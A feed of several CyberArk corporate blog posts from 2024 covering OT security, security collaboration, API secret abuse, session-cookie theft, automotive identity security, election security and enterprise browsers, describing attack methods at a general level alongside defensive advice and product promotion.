  • Guardians of the OT environments. Endpoint security solutions are essential for protecting the operational efficiencies of manufacturing environments. These solutions defend against the dark arts of malware and other cyberthreats, ensuring the continuity of production processes and the safety of critical data.
  • The bridge to secure remote access. With increased remote operations, secure remote access solutions are vital for maintaining secure connections to core business systems. Proper remote access lets in authorized users (aka friendly traders and countrymen) and disallows non-authorized users – and cyberthreats – from accessing privileged systems, helping you remain secure and private.
  • The isolated access to OT. Effective management of both human and non-human credentials is critical to securing sensitive systems. However, some legacy machines and systems can’t or won’t be changed. By providing authorized and authenticated users with isolated, secure access (aka fortress trenches and tunnels) to those machines or systems in OT environments, businesses can help mitigate risks.
  • A guide through compliance and risk management. Navigating the treacherous waters of regulatory requirements and cybersecurity risks requires robust identity security solutions. These solutions assist in managing compliance effectively, reducing risks and ensuring that the business remains protected and compliant.

Exploring Strategies for Enhanced Future Security

In an era where digital innovation and cybersecurity threats advance hand in hand, standing still is not an option. Your journey toward a more secure manufacturing operation begins with a single, crucial step: enhancing your identity security.

Discover how a comprehensive identity security solution has helped Coca-Cola Europacific partners create a robust defense against attacks that brought them closer to being the world’s most digitized bottling operation, all because they now have a 360-degree view of privileged access activities.

Christian Goetz is a director of presales success at CyberArk.

Editor’s note: Attackers constantly set their sights on any aspect vulnerable to an organization. To explore how you can build a defense-in-depth approach to securing all human and non-human identities across OT systems, check out our webinar, “13 Ways to Improve OT Security.” And, for a dive into OT cybersecurity and its challenges and opportunities, listen to our Trust Issues podcast conversation with Mike Holcomb, the Fellow of Cybersecurity and the ICS/OT Cybersecurity Lead at Flour. You can check it out in the player below or wherever you get your podcasts.

]]>
CIO POV: The Power of Cybersecurity Collaboration https://www.cyberark.com/blog/cio-pov-the-power-of-cybersecurity-collaboration/ Wed, 17 Apr 2024 15:01:54 +0000 https://www.cyberark.com/?p=189798 Cybersecurity Collaboration

You’ve undoubtedly heard Michael Jordon’s famous quote, “Talent wins games, but teamwork and intelligence win championships.” Jordan’s words encapsulate the fruition of team spirit and strategic thinking through tactical implementation. Similarly, in the cybersecurity world, we often say that security is a team game, but have you ever considered who’s on the team and who isn’t but should be?

Cybersecurity is the collective responsibility of every employee, partner, contractor and vendor to fortify all the walls and stop bad actors from gaining access to your kingdom. We can divide this collective responsibility into three layers that touch all aspects of the business. Internal collaboration is a starting point for this collective responsibility across all business functions. Then, there’s collaboration with the third-party vendor community. And then, we collaborate to share and learn from our peers’ experiences.

A three-fold approach to cybersecurity collaboration will bring constant scrutiny and attention to security issues while enabling faster communication. In essence, you’ll have more eyes across the organization’s IT environment that identifies impending risks, security incidents and potential breaches with shorter response time.

Let’s take a detailed look at the three-fold approach and how the effort can help you benefit from driving collaboration on collective cybersecurity responsibility.

The Three-Fold Approach to Cybersecurity Collaboration

Here’s what an optimal three-pronged cybersecurity collaboration effort looks like:

1. Internal Collaboration

While cybersecurity teams are responsible for securing the network, data, endpoints, workloads, user access, automation, orchestration and continuous threat detection and prevention, other business functions have an equal hand in ensuring continued education and responsible behavior that protects your organization’s digital assets. Think of your cybersecurity team as your Tier 1 stakeholder, with the authority to make decisions and implement security controls for the entire organization.

Your Tier 2 stakeholders include leaders of various business functions, such as HR or finance. For instance, HR ensures all new hires receive an optimal onboarding process intertwined with IT services and security controls deployment. These functional Tier 2 stakeholders can collaborate with Tier 1 stakeholders to implement best-in-class security controls and cybersecurity awareness training for all Tier 3 stakeholders, including employees, contractors and third-party partners.

We should consider all three tiers of stakeholders equally significant because if the average user – a Tier 3 stakeholder – can’t follow the recommended security hygiene by the other stakeholders, the entire organization winds up at risk of a security incident or a breach.

2.  External Collaboration

Now that we’ve spotlighted internal stakeholders let’s consider that our external stakeholders are third-party vendors in the increasingly complex technology ecosystem. A vulnerable software stack is a gateway for bad actors to unleash the chaos of malware and identity-related attacks. It’s, therefore, essential to build trust with each third-party vendor providing your organization with any product or service. These third-party vendors must address critical CVEs promptly and allow your organization’s Tier 1 stakeholders to review their offerings for quality and the vendor’s security posture.

Particularly now in the burgeoning era of AI-powered products and services, it’s more critical than ever that your organization’s Tier 1 stakeholders have a cadenced opportunity to evaluate the AI implementation in the products or services you use.

3. Peer Collaboration

Technology leaders and practitioners must learn from one another. As such, peer collaboration is the most important part of comparing and contrasting cybersecurity strategies that support unique business requirements.

There are a couple of different ways to participate in peer collaboration. For example, meet-up groups on relevant topics such as AI seek to bring together like-minded leaders to discuss their unique experiences and learn from shared experiences. Alternatively, industry-focused peer groups that focus on specific topics, such as the intersection of FinOps and security, can bring a wealth of knowledge to CIOs and CISOs of organizations operating in regulated industries. To this end, I will hold a CISO roundtable at CyberArk’s marquee identity security event, IMPACT ‘24, in Nashville next month. I hope to create a trusted circle of cybersecurity leaders who can leverage shared experiences to optimize cybersecurity collaboration on all three fronts mentioned above and deliver better defenses against back actors.

How Can Cybersecurity Collaboration Work Effectively?

For any initiative to succeed, it needs a detailed process plan. To design an effective collaborative approach, we must:

  • Communicate. Clear, concise and cadenced communication is the foundation of any successful collaborative initiative. I often recommend that more communication is better than none. This way, we can ensure that internal and external stakeholders know their roles and responsibilities.
  • Commit. I recommend a dedicated individual or team responsible for committing to cybersecurity collaboration initiatives within each stakeholder group. This way, we ensure accountability on key initiatives with assurances that they do not fall through the cracks.
  • Empower. Part of any team sport is to ensure your team members are empowered to make effective decisions quickly. If you are the bottleneck, make sure you have a plan to get out of the way. Remember, agility is essential because, in cybersecurity, no one day is the same as yesterday.
  • Educate. Continuously educate all stakeholders on standard cybersecurity hygiene. The basics of common security practices are often the key to thwarting bad actors.
  • Motivate. Remember that every sports competition ultimately crowns a winner, and every winner receives a prize. Think of how you can motivate and incentivize your stakeholders to remain committed to continued cybersecurity collaboration. It may be as simple as a quarterly award or recognition to help ensure collaboration practices run deep within your organization’s DNA.

I would love to hear about how you initiate collaboration in your organization. I also hope you attend (and participate in) my CIO and CISO roundtable at CyberArk IMPACT in Nashville. Here’s to fostering collaboration because … we’re all playing for the same team.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.

]]>
Understanding APIs and How Attackers Abuse Them to Steal Data https://www.cyberark.com/blog/understanding-apis-and-how-attackers-abuse-them-to-steal-data/ Fri, 12 Apr 2024 19:55:23 +0000 https://www.cyberark.com/?p=189643 Abstract image depicting a humanistic machine identity to accompany API security-focused blog post.

Simply put, APIs (short for application programming interface) are how machines, cloud workloads, automation and other non-human entities communicate with one another. They also represent an access point to highly sensitive company data and services. Almost every organization uses these machine interfaces, and their usage is only growing because they are essential to digital transformation and automation initiatives. Machine identities and APIs are closely connected because any programmatic interface accessing important data or protected services needs an identity, such as a password, API key or another secret.

While essential and prevalent, APIs are potential attack vectors when not properly protected via machine identity security best practices. They can be exploited to expose sensitive data (e.g., customer lists, personally identifiable information (PII) and credit card details) while enabling application-to-application communication.

How Cyber Criminals Abuse and Exploit APIs

Cyberattackers are constantly attempting to steal and compromise the powerful secrets that allow machines to run APIs as the stolen machine identity. By doing so, they can assume the identity of whatever had that secret and use it to gain more access and privileges to reach their goal. Along the way, they could, for instance, enable a script or a user to stop or start a virtual server, copy a database or even wipe out entire cloud workloads.

Fortunately for attackers, developers under pressure to move quickly often take shortcuts, such as hard-coding API keys and other secrets. Take the Uber breach reported in 2022 as an example: the attacker found and used hard-coded secrets embedded in a PowerShell script to gain high-level access and escalate privileges.

Since many security teams view API security as a code issue, they may not know how many APIs and API secrets exist within their organization, where they’re located or how they are used. A 2023 Ponemon Institute study reveals that more than half of IT and IT security professionals say it’s challenging to discover and inventory all APIs. The many third parties connected to an organization’s APIs exacerbate this challenge. And as attackers shift left into software development and testing environments, insecure API design and functionality significantly increase software supply chain risks.

These factors may be why organizations are only confident in preventing 26% of API attacks and believe that only 21% of such attacks can be effectively detected and contained, according to the same Ponemon study. As API access to critical resources continues to sprawl, it’s time for security to change how they think about APIs.

Top API Identity Security Risks

Most of today’s top API security risks relate to identity. Yet, critical identity security controls in many organizations, including least privilege enforcement and continuous monitoring, only cover human users. This means that secrets used by applications, scripts and other machine identities – that outnumber human identities 45:1 – are exposed. Attackers can “hook” API keys and other secrets through phishing attacks, find them embedded in applications, automation scripts and DevOps tools and steal them from public repositories like GitHub to access sensitive company assets. Artificial intelligence (AI) advancements have made it even easier for cybercriminals to automate and scale identity-based attacks.

The Open Web Application Security Project (OWASP), a recognized industry source for software security research, highlights some recent pressing API identity security issues in its 2023 API Security Top 10 list, including those outlined below.

Visual of OWASP 2023 API security top 10 highlights identity security risks

Simplify API Security with Centralized Secrets Management

Forward-looking organizations are working to understand how digital business characteristics impact their security practices and move toward a Zero Trust model. As part of this, they view human and non-human identity security as equally important. They’re tackling secrets management challenges by centralizing and automating how applications, DevOps and automation tools use API keys and other secrets to access databases, cloud environments and other sensitive resources. With this approach, they only have one program to support but can gain the full visibility, audit trails and policy enforcement capabilities they need to ensure nothing falls through the cracks.

Companies we work with have also seen how centralized secrets management simplifies how development and security teams protect applications, CI/CD pipelines and the software supply chain. They’re doing this with out-of-the-box integrations with existing tools and platforms so that tasks like secrets rotation, audit and data collection automatically run in the background without impacting developer workflows.

Properly securing APIs and other non-human identities is imperative for business. Organizations that do it right will be better positioned to defend against cyberattacks, drive operational efficiencies, satisfy audit and compliance requirements and enable innovation.

John Walsh is a senior product marketing manager at CyberArk.

]]>
Cookies Beyond Browsers: How Session-Based Attacks Are Evolving https://www.cyberark.com/blog/cookies-beyond-browsers-how-session-based-attacks-are-evolving/ Tue, 09 Apr 2024 15:05:01 +0000 https://www.cyberark.com/?p=189077 Cookies Beyond Browsers

In the past few years, we have witnessed a significant shift in the attack landscape, from stealing clear text credentials to targeting session-based authentication. This trend is driven by the proliferation of multi-factor authentication (MFA), which makes it harder for attackers to compromise accounts with just passwords. However, MFA is not a silver bullet, and post-authentication materials like session tokens, cookies, API keys and machine certificates can still be exploited to bypass authentication and gain access to sensitive systems and data.

In this blog post, I will share some of our red team insights and explain how session-based attacks are evolving beyond the web browser. I will also recommend ways for organizations to protect themselves from these threats and reduce their attack surfaces.

What Are Post-Authentication Attacks and Why Are They Dangerous?

Post-authentication attacks are a type of attack that targets the authentication tokens that are used to maintain a user’s or a machine’s identity and access rights after the initial login process. These tokens can take various forms, such as cookies, API keys, machine certificates and OAuth tokens. They are often stored in the browser, in files, in memory or in databases and are transmitted over the network when a user or a machine interacts with a web application or an API.

The main advantage of session-based attacks for the attackers is that because they happen after the authentication phase and the user is already validated, they can bypass MFA and other security controls applied at the login stage. An attacker can impersonate the user or the machine and access their authorized resources by stealing or forging a valid session token (via the Golden Ticket or Golden SAML attack technique). Moreover, session tokens are often long-lived and have broad privileges, meaning the attacker can maintain persistence and move laterally within the network.

How Post-Authentication Threats Are Evolving Amid the Expanding Attack Surface

The most well-known and common form of post-authentication attack is cookie stealing, which involves capturing or manipulating the cookies used by web browsers to authenticate users to web applications. Cookies are session tokens issued to the web server after users log in with their credentials and MFA and are stored in the browser. The browser then sends the cookies along with every request to the web server, which validates them and grants access to the user.

Cookie stealing can be performed in various ways, such as:

  • Exploiting vulnerabilities in the web application or the browser, such as cross-site scripting (XSS), cross-site request forgery (CSRF) or XML external entity (XXE) injection, that allow the attacker to execute malicious code or requests on behalf of the user and access their cookies.
  • Sniffing or intercepting the network traffic between the user and the web server and extracting the cookies from the HTTP headers. This can be done by compromising the user’s device, the web server or any intermediate node on the network, such as a router, a proxy or a firewall.
  • Accessing the browser’s storage, where the cookies are saved, and copying them to the attacker’s device. This can be done by exploiting the user’s device or by tricking the user into downloading a malicious browser extension, a file or software that can read the browser’s storage.
  • Scraping the browser process memory space, some cookies are stored as session cookies, which means they are not written to disk and exist only within the browser memory as ephemeral cookies for the duration of the session and as long as the browser is open. Since the browsers are designed to run as unprivileged applications, any other program with the same level of access (unprivileged) can read the browser memory.

As you can see, cookies are key security material and are thought out by threat actors. If you were to eliminate cookies from the browser, the experience would become more secure. And that’s no longer a hypothetical scenario, with the arrival of our recently released, identity-centric CyberArk Secure Browser – an industry first (and which our red team helped develop). The browser eliminates the writing of cookies to a device’s disk, which means there are no cookies for attackers to steal. By eliminating cookies from the disk, organizations can help protect themselves from certain types of session-based attacks that rely on stealing cookies to bypass the authentication process.

However, cookies are not the only form of session token that session-based attacks can target. As web applications and APIs become more complex and diverse, and as more machines and devices communicate with each other over the internet, other forms of session tokens are emerging and becoming more prevalent. These include:

  • API keys, which are secret tokens that are used to authenticate and authorize machines or programmatic users to access APIs. API keys are often used for programmatic or automated interactions with cloud services, such as spinning up virtual machines, accessing storage buckets or sending notifications. API keys are usually stored in files or databases and transmitted over the network as HTTP headers or parameters.
  • Machine certificates, which are digital certificates that are used to authenticate and authorize the communication between machines or devices. Machine certificates, such as VPNs, HTTPS or SSH, are often used to secure connections between servers, clients and IoT devices. Machine certificates are usually stored in files or hardware modules and are transmitted over the network as part of the TLS handshake.
  • OAuth tokens, which are tokens that are used to delegate access to third-party applications or services. OAuth tokens are often used for social login, where a user can sign in to a web application using their existing account from another platform, such as Google, Facebook or X (née Twitter). OAuth tokens are usually stored in the browser or databases and transmitted over the network as HTTP headers or parameters.

These session tokens are also vulnerable to session-based attacks and can be stolen or forged by attackers in ways similar to cookies. For example:

  • API keys can be exposed by vulnerabilities in the API or the client, by network sniffing or interception – or by accessing the files or databases where they are stored
  • Machine certificates can be compromised by vulnerabilities in the TLS protocol or the implementation, network sniffing or interception or accessing the files or hardware modules where they are stored.
  • OAuth tokens can be hijacked by vulnerabilities in the OAuth protocol or the implementation, network sniffing or interception or accessing the browser or databases where they are stored. (A recent example of this is APT29’s attack on Microsoft, where the attackers breached a legacy test OAuth application and then created a series of malicious OAuth apps, which enabled them to gain further access. This ultimately allowed the attackers to access certain corporate email accounts.)

How Organizations Can Help Protect Themselves From Post-Authentication Attacks

Post-authentication attacks are a serious and growing threat, and organizations need to take proactive measures to protect themselves and their users from these attacks. Some of the best practices and recommendations that organizations can follow are:

  • Implement the principle of least privilege (PoLP) and limit the scope and duration of the session tokens. Session tokens should only grant the minimum access rights needed, when needed (just-in-time), for the specific task or interaction and should expire or be revoked as soon as possible. This can reduce the impact and the risk of session token compromise.
  • Enforce strong encryption and integrity checks on the network communication and the session tokens. Session tokens should be encrypted and signed by the issuer and transmitted only over secure channels, such as HTTPS or TLS. This can prevent the attackers from sniffing, intercepting or tampering with them.
  • Monitor and audit the usage and activity of session tokens. The issuer should log and track session tokens and any abnormal or suspicious behavior, such as multiple or concurrent logins, unusual locations or devices or anomalous requests or actions, should be detected and alerted. This can help organizations identify and respond to session token compromise.
  • Educate and train the users and the developers on the risks and the best practices of session token security. Users should be aware of the dangers of phishing, malware and social engineering and avoid clicking on suspicious links, downloading unknown files or sharing their session tokens with anyone. Developers should be familiar with the latest session token security standards and guidelines and follow secure coding and testing practices.

With attackers relentlessly finding new ways to exploit them, post-authentication attacks are a complex and evolving challenge. Organizations must be prepared and vigilant to defend themselves from these threats by implementing security measures such as least privilege, monitoring and maintaining an assume breach mindset. Additionally, solutions such as CyberArk Secure Browser, which completely eliminates cookies from the disk, can provide an added layer of protection.

Shay Nahari is VP of CyberArk Red Team Services.

Editor’s note: For more insights from Shay Nahari on this subject, secure web browsing and beyond, listen to the April 2024 CyberArk Trust Issues podcast episode, “Secure Browsing and Session-Based Threats.” The episode is available in the player below and on most major podcast platforms.

]]>
How Secure is Automotive Digital Identity? https://www.cyberark.com/blog/how-secure-is-automotive-digital-identity/ Tue, 02 Apr 2024 19:52:00 +0000 https://www.cyberark.com/?p=188799 Image of connected cars communicating with one another for blog about automotive digital identity and security

In the automotive industry’s fast lane, the fusion of digital innovation with vehicular engineering has revolutionized how we manufacture, drive and protect our vehicles. It also helps to ensure our cars are safeguarded against cyber risks. And it’s at this juncture that identity security emerges as a critical priority – serving as both a shield and a guide, leading the industry through the complexities of cybersecurity in automotive challenges with unmatched precision.

Defending the Digital Road

Imagine the automotive industry as a vast, interconnected network of highways, where every vehicle – from family sedan to motorcycle to the most sophisticated autonomous car – communicates within a world far beyond the asphalt through connected vehicle technology. This seamless interaction is powered by vehicle-to-everything (V2X) technology, enabling connected cars to communicate with one another – and with infrastructure, pedestrians, networks and even the power grid. Connected vehicle technology forms the backbone of modern automotive safety and efficiency, facilitating real time sharing of crucial data such as traffic conditions, weather updates and road safety alerts.

However, it also introduces novel challenges in cybersecurity, making the role of secure identity verification more critical than ever at the manufacturing stage. Each connected car, acting as a pivotal node in the safety and operational efficiency of our digital highways, relies on a next-generation automotive and mobility security solution to safeguard the integrity of data exchange and protect against cyber threats to help ensure the seamless functionality of this intricate and interconnected network.

Elevating Automotive Security Through Identity Protection

The mastery of securing the privileged pathways of the automotive manufacturing ecosystem acts like an invisible shield. From the initial design sketches to the factories that bring new cars to life, a comprehensive approach to identity security helps ensure that every entity, human or machine, is thoroughly verified, authenticated and monitored.

The journey from innovation to vulnerability can unfold through a sophisticated attack chain in the rapidly evolving automotive industry. Sometimes, it might begin with credential theft, where attackers mine sensitive information through methods like social engineering. These malicious actors, whether external or internal, navigate an organization’s digital ecosystem, moving laterally across systems or vertically to higher privileges, aiming to disrupt operations or steal valuable data. Understanding and dismantling this attack chain, with a strategic approach for identity security, is critical for automotive leaders to shield their operations and vehicles against today’s multifaceted cyber threats.

Graphical image for automotive security blog. Title of image is: "Dissecting the Attack Chain"

For manufacturers, this means securely guarding their blueprints, production secrets and assembly output.

Navigating the Top Seven Automotive Cybersecurity Challenges with Identity Security

Understanding the seven critical areas of automotive cybersecurity is crucial, as identity security can significantly enhance your organization’s preparedness and strengthen its stance against potential breaches. This strategic knowledge enables you to stay ahead in safeguarding against identity-related vulnerabilities within the automotive sector:

  1. V2X communication. Today’s vehicles are manufactured with the capability to communicate with one another, and their infrastructure and identity security act as trusted couriers that validate human and non-human identities in the automotive manufacturing process.
  2. Identity verification. Cyber threats loom like bandits in the digital expanse. Advanced identity verification acts as a vigilant patrol, safeguarding the credentials and secrets of administrators, users, applications, and machines interacting with connected vehicles and data.
  3. Regulation and compliance. The automotive world’s regulatory environment is a labyrinth and ever-changing. A robust identity security strategy is like GPS, guiding manufacturers through compliance and helping to ensure a smooth regulatory journey, which is a growing challenge for automotive manufacturers as cars become increasingly data-centric.
  4. Supply chain. Picture the automotive supply chain as a network of roads and bridges. A unified identity security approach provides rigorous checkpoints, verifying each component’s integrity before it enters the production line, underpinning the seamless integration of connected devices.
  5. Data privacy. Strict identity security protocols secure this data within cloud and enterprise environments against unauthorized access, safeguarding the manufacturing of connected vehicles.
  6. Market growth. As the realm of automotive cybersecurity widens like an expanding network of roads and infrastructure, scalable identity security solutions help provide safe passage across a burgeoning ecosystem of connected devices.
  7. Collaboration. Automakers and cybersecurity entities must unite to share insights and strategies. Secure identity management facilitates this collaboration, helping to ensure the secure exchange of information and bolstering the collective defense of connected vehicles throughout the auto manufacturing process.

Driving Toward a Secure Horizon

Cybersecurity leaders can help steer their organizations toward secure, modernized processes with a comprehensive identity security strategy. Learn how a leading manufacturer reduced operation time by 87% while improving security.

Brian Carpenter is a senior director of business development, and Christian Goetz is a director of presales success at CyberArk.

 

Editor’s note: The complexities of the automotive industry require a holistic platform-based approach to secure cars of the present and future. Take a spin into this topic and listen to our Trust Issues podcast episode, “What’s Driving the Future of Automotive Security,” with guest Kaivan Karimi, Global Partner Strategy and OT Cybersecurity Lead – Automotive Mobility and Transportation at Microsoft. Karimi discusses the emphasis on identity security, data sovereignty, data privacy and compliance as we collectively navigate technological advancements in the automotive industry.

]]>
Election Security: Defending Democracy in Today’s Dynamic Cyber Threat Landscape https://www.cyberark.com/blog/election-security-defending-democracy-in-todays-dynamic-cyber-threat-landscape/ Thu, 28 Mar 2024 14:30:22 +0000 https://www.cyberark.com/?p=188718 election security cyber threat landscape

With over 50 countries heading to the polls this year, including major economies like the U.S., India and the U.K., 2024, one way or another, will be a defining year with over 4 billion voters – around half the world’s population – participating in the democratic process. However, amid this global exercise in democracy lurks a growing threat landscape fueled by ongoing geopolitical tensions, evolving technology and the ever-present risk of malinformation that can sway the election outcomes.

In recent years, misinformation and disinformation campaigns have influenced public opinion. In the 2019 U.K. election, several political advertisements and social media campaigns deceived voters with false claims and hidden agendas. In 2016, we witnessed how foreign adversaries’ potential involvement led to a breach and a leak of confidential data to influence the public and the outcome of the U.S. presidential race. Recognizing this, federal law enforcement and cybersecurity officials have warned state election officials about the impending threats ahead of the November 2024 U.S. Presidential elections.

With lots of cyber drama undoubtedly around the corner, let’s look at what’s at stake.

Geopolitical Risks and Nation-state Attacks

The intersection of global armed conflicts and cyber warfare significantly amplifies the risk to critical infrastructure, which is pivotal in supporting election machinery across countries on the verge of upcoming elections. Elections officials and their security teams will be highly vigilant. They are planning robust security strategies in a game to checkmate their aggressors who aim to disrupt the networks of government agencies and their technology partners.

According to the Election Cyber Interference Threat Research Report 2024, the U.S., U.K., South Korea and India are the riskiest countries concerning election cyber interference from geopolitical adversaries like China and Russia. We have seen a rise in state-sponsored cyberthreats recently, with the most recent infiltration by APT29 into the Microsoft and HPE networks to spy on executives’ emails. While initial reports from Microsoft and HPE indicated limited damage, after further investigation, Microsoft reported that APT29 gained access to the company’s source code repositories and internal systems. There’s no doubt that this is a warning sign that bad actors are quietly and strategically placed in the backyards of the technology vendors who provide critical infrastructure to many governments worldwide. Similarly, in February 2024, Volt Typhoon, a Chinese group, breached vital network systems from a widely used supplier by U.S. government agencies. These are known instances of cyberthreats from foreign adversaries in the first two months of 2024 alone. Throughout the year, it’s expected that these foreign adversaries – intent on wreaking havoc – will relentlessly try to penetrate inside the walls of every sovereign democracy. While we know what we know, I’m certain we’re unaware of plenty of bad actor activity.

The Age of AI, Misinformation and Disinformation – The Run-up to Election Day

As any country approaches election day, a new battleground emerges one where artificial intelligence (AI), misinformation and disinformation collide. The rise of phishing and vishing attacks threatens to exploit voter identities, potentially leading to election fraud. Covert influence campaigns, meticulously orchestrated, can sway voter mindsets and election outcomes. The recently published Annual Threat Assessment of the U.S. Intelligence Community, released by the Office of the Director of National Intelligence, confirmed potential international interference via social media during the 2022 U.S. midterm election cycle. And now, with the advent of AI, strategic targeting of individuals or groups of individuals via impersonation attacks will be on the rise and increasingly difficult to identify as legitimate. For example, in January, voters in New Hampshire received a robocall seemingly from U.S. President Joe Biden asking them not to vote in the state’s primary. Upon investigation, state officials determined it was an AI-enabled vishing attack intended to manipulate the elections.

In an attempt to pre-empt similar attacks, South Korea’s National Police Agency (KNPA) has implemented a tool to detect deep fakes. These sophisticated algorithms aim to identify manipulated videos and prevent their spread during the elections. The issue we must recognize here is not limited to the spread of misinformation but the human tendency to readily believe the messages they see or read regularly.

In our increasingly digital world, many voters depend on social media as their primary source of news and information despite the general knowledge that it’s a breeding ground for rampant misinformation and disinformation. Safeguarding elections is a combined responsibility – of the people and by the people – in any democracy. As such, all stakeholders, including political parties, election officials, social media websites and voters, must work together and adopt best practices and measures to protect the electoral process.

Pull quote: "As a CIO, I recognize that securing our election processes is not an isolated task but a collective responsibility, and we cannot do this alone. It requires partnerships between government agencies, technology vendors, election officials and, most importantly – voters."

Election Infrastructure is an Expanded Threat Vector

The shift from analog to digital and physical to virtual impacts not only the workforce in the digital era but also voters worldwide. In this sea of change, nations must secure and protect every aspect of their election machinery. These are the critical aspects that require special attention to ensure a successful democratic election exercise:

  • Voter registration databases store the personal information of millions of voters in each country and decide who can vote where. These databases hold highly sensitive personal information, such as names, government I.D. numbers, dates of birth and the addresses of millions of voters in each country. Voter fraud is a real threat if voter identity and credentials are stolen and misused to cast unauthorized votes. If exposed, this information can be used to swing election results by various methods where bad actors can persuade (via social engineering) voters to vote a particular way.
  • Electronic poll books (EPBs) are endpoint devices or kiosks designed to partially automate the voter check-in process, detect ineligible voters, assign correct ballots and keep tabs on voters who have issued a ballot. EPBs can be targeted in many ways, including DDoS, malware attacks, data breaches and system vulnerabilities.
  • Electronic voting machines (EVMs) are terminals where voters can cast ballots in-person or scan mail-in votes. The threat vectors for EVMs are like EPBs. Outdated EVMs are at high risk. For example, the EVMs used in India were designed in 1989. They can run the risk of dated software with potential vulnerabilities that can cause irreparable harm to the election results if exploited by bad actors.
  • Tabulation is the process of counting the ballots cast at the polling places. Bad actors can hack into voter tabulation systems to disrupt an election and its results.
  • Websites that provide voters with information on election processes can be disabled by bad actors and cause inconvenience and confusion for voters.

Defend the Democratic Exercise with Defense-in-depth

In the high-stakes world of election security, trusting a single line of defense is not enough. That’s where the concepts of defense-in-depth and Zero Trust come in, offering a layered approach to protecting critical election machinery. The following multi-layered approach is crucial for protecting all access points to election systems, from voter registration databases to voting machines:

  • Defense-in-depth strategy uses multiple, independent security controls, such as firewalls, intrusion detection systems and network segmentation, to protect election systems from different angles. Even if one layer is compromised, the others can prevent or slow down the attackers, buying valuable time to respond and contain the threat. This is a non-negotiable consideration in fortifying every aspect of the election machinery.
  • Zero Trust is a principle that assumes no trust within the system and requires continuous verification of every user and device, regardless of their level of access. Users and systems should be verified continuously and given minimum access to perform their duties while always assuming breach. Our research indicates that most organizations believe identity and endpoint are the top two considerations for a successful Zero Trust implementation. This means IAM capabilities (i.e., phishing-resistant MFA, SSO and PAM) and endpoint protection are critical to ensuring fine-grained control over who accesses which data where and for how long.
  • Identity Threat Detection and Response (ITDR) is a relatively new capability that detects and responds to identity-based threats, such as credential theft, privilege misuse and misconfiguration across the complex IAM landscape spanning hybrid and multi-cloud environments. ITDR can help analyze, report and remediate unprotected access paths and adversarial behaviors.
  • Endpoint protection incorporates antivirus software, removing admin rights and patch and change management.
  • Data security is bolstered by encryption, access controls, backups, monitoring and data classification to ensure data confidentiality and integrity.

Don’t Forget Basic Cyber Hygiene

As we battle the rising cyber risks during this election year by enabling security practices and processes to help safeguard the democratic exercise, it is equally important to brush up on the basic cybersecurity hygiene practices that have been around for years. Remember, even though national elections around the world happen on a cadence of four to five years, these cybersecurity hygiene practices have to be done more frequently for them to become second nature for every individual, whether it is election year or not.

  • Poll worker training should include methods to recognize and report suspicious behavior, identify EVM errors or glitches and safeguard voter data.
  • Voter training and awareness must include best practices for identifying legitimate sources of news and information and incorporating practices to protect against potential AI-generate deep fakes, phishing and vishing attacks.
  • Audit and monitor the security posture and threat landscape frequently across all aspects of the election machinery in the run-up to the elections and after that.
  • Equipment testing should include user-centric design, ballot secrecy, security (such as software updates and change management), language options, consistency in user experience and general accessibility.
  • Contingency planning must cover backup and disaster recovery strategies in the event of a cybersecurity incident to avoid disruptions and unexpected outages.

The Election Process is a Collective Responsibility

As a CIO, I recognize that securing our election processes is not an isolated task but a collective responsibility, and we cannot do this alone. It requires partnerships between government agencies, technology vendors, election officials and, most importantly – voters. The 2024 elections, encompassing over half the global population, face unprecedented threats from cyberattacks, misinformation and outdated technology. Defense-in-depth does not start with products; it begins with us. It’s time we all do our part as individual voters, election officials, politicians – and, yes, technology providers – the time to act is NOW.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page

]]>
Enterprise Browsers Need to Secure Identities Without Compromise https://www.cyberark.com/blog/enterprise-browsers-need-to-secure-identities-without-compromise/ Wed, 27 Mar 2024 03:57:32 +0000 https://www.cyberark.com/?p=188267 Blog feature image -- abstract interconnected nodes to convey secure web browser notion.

Now is the time.

It’s been over 30 years since the introduction of the first web browser. Since then, the browser has evolved into an application that allows us to stream entertainment, work and interact through social media. It’s the most widely used application among consumers … and now the enterprise.

Unfortunately, there’s little separation between work and personal life when you use a browser designed for consumer use. In short, it means any organization’s security is at risk – and there’s no lack of data breach headlines to make this painfully obvious.

In my travels over the years with CyberArk and as an entrepreneur, I’ve had numerous conversations with CISOs, CIOs and security practitioners about security risks and what this means for the browser. There’s consensus in the realization that consumer browsers like Google’s Chrome, Microsoft’s Edge and Apple’s Safari aren’t enough for the workplace.

In recent years, attackers have exploited vulnerabilities in consumer browsers by stealing cookies to breach organizations. In fact, our CyberArk Labs team has conducted research on cookie theft that resulted in hijacked sessions. In minutes, they can demonstrate how to take over sessions quickly. It’s a scary scenario, but we must ensure organizations are protected using an enterprise browser through cookieless sessions and a true passwordless solution.

Author pull quote: "Browsers designed for consumers lack the critical controls for the enterprise workspace."

So, here’s the problem: browsers designed for consumers lack critical controls for the enterprise workspace. They don’t consider the surge of workforce identities and the multitude of endpoints employees use to access company data. This shortcoming opens consumer-based browsers to vulnerabilities attackers can exploit to steal an organization’s critical data. It’s a significant gap for any organization, especially when workers use a regular browser to access corporate resources.

At CyberArk, we listened to our customers, and today, we’re excited to deliver an identity-focused enterprise browser that provides added protection to one of the most frequently used applications in any organization. An enterprise browser is the gateway to securing identities and your corporate data.

There are three key areas a secure identity-focused browser will address in any organization:

  1. Improved security
  2. Enhanced productivity
  3. Increased privacy

Improved Security Driven by SaaS

In the last decade, enterprises have rapidly shifted toward using SaaS-based applications for work fueled by on-premises applications that have transformed into SaaS models. This transformation of how we work, combined with the fast-paced growth in identities thanks to remote workforces, unmanaged Bring Your Own Device (BYOD) policies, new environments and attack methods, have all contributed to the need to improve how we protect an enterprise from all access points.

The shift toward SaaS was also fueled heavily by the pandemic’s onslaught. Now, with remote workers more reluctant to return to an office setting, the hybrid work model or even a fully remote office has become the wave of the future.

Accessing our enterprise resources through the browser drives the need for an added layer of security that sits within the security infrastructure. At CyberArk, we take a defense-in-depth, layered security approach to securing web sessions, least privilege on endpoints, passwordless and privileged access, for example. A secure browser brings the layers together at the highest level to secure our identities and serve as the gateway to our corporate data.

Enhanced Workforce Productivity

There’s a balance between security and worker productivity. How we protect the enterprise using a secure browser cannot come at the cost of worker productivity. An enterprise browser must offer the same seamless, familiar experience as their favorite browser, providing users access to their enterprise resources without affecting the user experience. It must be frictionless.

